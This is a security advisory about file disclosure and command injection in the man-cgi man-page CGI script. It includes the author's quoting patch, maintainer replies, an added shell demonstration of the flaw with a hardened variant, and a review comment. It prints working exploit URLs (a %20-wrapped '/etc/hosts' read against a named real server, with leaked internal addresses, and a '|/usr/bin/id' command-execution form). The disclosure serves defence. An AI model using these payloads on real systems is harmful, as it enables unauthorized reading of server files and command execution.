Man-cgi v1.3 and v2.0 contain remote vulnerabilities which allow any file on the web server to be viewed, and some implementations allow remote command execution due to lack of filtering of hex-encoded characters. Exploit URLs included.
bde148ba24eeeaed3cbb01ed7b0992252003c4928d9ca6fd786ddf9a3fc401df
While researching several CGI-based man page front ends for possible holes, I ran across the
following buggy code:
© 1994-1999 Man-cgi 2.00, Panagiotis Christias
<christia@softlab.ntua.gr>
© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,
<d.j.adams@soton.ac.uk>
© 1994 Man-cgi 1.15, Panagiotis Christias
<christia@theseas.ntua.gr>
© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana
<tom@sorry.vse.cz>
The issue is that the script does not filter %20 or any other hex-encoded character in the
URL. Supplying a hex-encoded space followed by a known file name causes the script to
display that file with the permissions of the web server. In some implementations it is
also possible to specify the path to a known executable, for example /usr/bin/id, and have
it run. These issues may be used to disclose sensitive information on your server, or
possibly to allow someone to run any command they want on it. If you have further
questions, mail me.
----------------------------------------------------------
http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20
reveals the following
#
# Internet host table
#
127.0.0.1 localhost
#147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.211 patroklos.noc.ntua.gr patroklos
147.102.222.230 ulysses.noc.ntua.gr ulysses
# Required for backup
147.102.222.250 menelaos.noc.ntua.gr menelaos
-----------------------------------------------------------
http://xxx/cgi-bin/man-cgi?/usr/bin/id
or
http://xxx/cgi-bin/man-cgi?|/usr/bin/id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
-----------------------------------------------------------
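The following is an added example, not code from man-cgi or from any of the people quoted in this post. It emulates in portable sh the pattern the advisory describes: a decoded query value is placed unquoted after an awk program, so an encoded space (%20) splits it into a `PAGE=` assignment and a separate word that awk opens as an input file. It shows the file-read path only; where the `|/usr/bin/id` form reaches a shell depends on the installation and is not reproduced here. Beside the vulnerable lookup is a hardened one that rejects anything that is not a plausible page name and quotes the expansion. The helper names (`url_decode`, `make_secret_file`, `vulnerable_lookup`, `safe_lookup`), the sample file and its contents, and the whitelist are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not man-cgi's own code: a sh emulation of the unquoted
# awk operand pattern from the script, the effect of a %20 in the query,
# and a hardened lookup that validates and quotes the value.
# Assumes POSIX sh and awk; file names, function names and the sample
# file contents are constructed for the demonstration.

# Decode %XX sequences as the query string would be decoded before use
# (constructed helper; portable awk, no strtonum/gensub).
url_decode() {
    printf '%s' "$1" | awk '
        BEGIN { hex = "0123456789ABCDEF" }
        {
            s = $0; out = ""
            while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
                hi = index(hex, toupper(substr(s, RSTART + 1, 1))) - 1
                lo = index(hex, toupper(substr(s, RSTART + 2, 1))) - 1
                out = out substr(s, 1, RSTART - 1) sprintf("%c", hi * 16 + lo)
                s = substr(s, RSTART + RLENGTH)
            }
            printf "%s", out s
        }'
}

# Constructed stand-in for a sensitive file such as /etc/hosts or /etc/passwd.
make_secret_file() {
    dir=$(mktemp -d) || return 1
    printf 'TOP SECRET: constructed sample content\n' > "$dir/secret"
    printf '%s\n' "$dir/secret"
}

# Vulnerable form. PAGE=$COMMAND is unquoted, as in the pre-patch script:
# a decoded value " /path/to/file " is word-split into "PAGE=" and
# "/path/to/file", awk treats the second word as an input file, and the
# file's contents come out instead of the piped-in manual text.
vulnerable_lookup() {
    COMMAND=$(url_decode "$1")
    printf 'formatted manual text for %s\n' "$COMMAND" |
        awk '{ print "[" PAGE "] " $0 }' PAGE=$COMMAND
}

# Hardened form: reject anything that is not a plausible manual page name
# before it reaches a command line, then quote the expansion so no further
# splitting or globbing can happen. The whitelist is an assumption; tighten
# it to the page names your site actually serves.
safe_lookup() {
    COMMAND=$(url_decode "$1")
    case $COMMAND in
        ''|*[!A-Za-z0-9._+-]*)
            printf 'rejected: "%s" is not a valid page name\n' "$COMMAND" >&2
            return 1 ;;
    esac
    printf 'formatted manual text for %s\n' "$COMMAND" |
        awk '{ print "[" PAGE "] " $0 }' PAGE="$COMMAND"
}

# Demonstration: the same %20-wrapped path shape as the advisory's URL.
secret=$(make_secret_file)
printf 'vulnerable: %s\n' "$(vulnerable_lookup "%20${secret}%20")"
printf 'safe:       %s\n' "$(safe_lookup "%20${secret}%20" 2>&1 || true)"
printf 'safe ls:    %s\n' "$(safe_lookup ls)"
rm -r "${secret%/secret}"
```

Quoting alone (the `PAGE="$COMMAND"` form) is enough to stop the word-splitting shown here, because awk then receives a single `PAGE= /path ` operand and treats it as an assignment rather than a file. The whitelist is the part that also blocks `|`, `/` and other shell metacharacters wherever else the value is interpolated in the script.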
Below are the author's patch and comments, followed by a reply from one of the people who has
modified the script to operate on other OSs.
Sorry for my delayed reply, too much work to do and too much email
to read and reply to. Here is a quick fix:
***************
*** 185,191 ****
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE=$COMMAND URL=$MANCGI
fi;
---- 178,184 ----
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE="$COMMAND" URL="$MANCGI"
fi;
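Review bot: quoting `PAGE="$COMMAND" URL="$MANCGI"` stops the shell from word-splitting the decoded query, so a value such as ` /etc/hosts ` reaches awk as one `PAGE=...` assignment operand instead of splitting into `PAGE=` plus a separate `/etc/hosts` operand that awk opens as an input file; that matches the `%20/etc/hosts%20` URL in the advisory above. It does not validate `$COMMAND` itself, and this is only one of the places the value is used (the author says below that several other parts still need correcting), so the `|/usr/bin/id` form reported in the advisory is not addressed by this hunk. Suggest rejecting any `$COMMAND` containing characters outside a manual page name whitelist before its first use, e.g. `case $COMMAND in *[!A-Za-z0-9._+-]*) exit 1;; esac`, and then quoting every expansion of it in the rest of the script.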
The values of the PAGE and URL variables should be quoted. This is the first
step. I should correct several other parts of the script. I was quite naive
when I wrote man-cgi several years ago :)
You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi
Regards,
Panagiotis
--
Panagiotis J. Christias Network Management Center
P.Christias@noc.ntua.gr National Technical Univ. of Athens, GREECE
----------------------------------------------------------------
On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:
Sorry to be so dim, but I really could not fathom the point you were trying
to make with your first email. Only now do I understand the significance
of putting in the %20 (space character). I still don't understand your
anonymity, but I guess I can live with it.

The man-cgi script was written by Panagiotis Christias, and I made some
enhancements and got it working for Solaris. It works so well that no one
(AFAIK) has bothered to re-write it for Perl.

I am grateful that you have pointed out this security loophole to us.
It is up to you whether you report it through the normal channels or not.
As it can be used to read the /etc/passwd file it could be a real security
threat. I will look at the script and see if I can find a solution, I hope
Panagiotis will do the same.
--
David Adams
Computing Services
Southampton University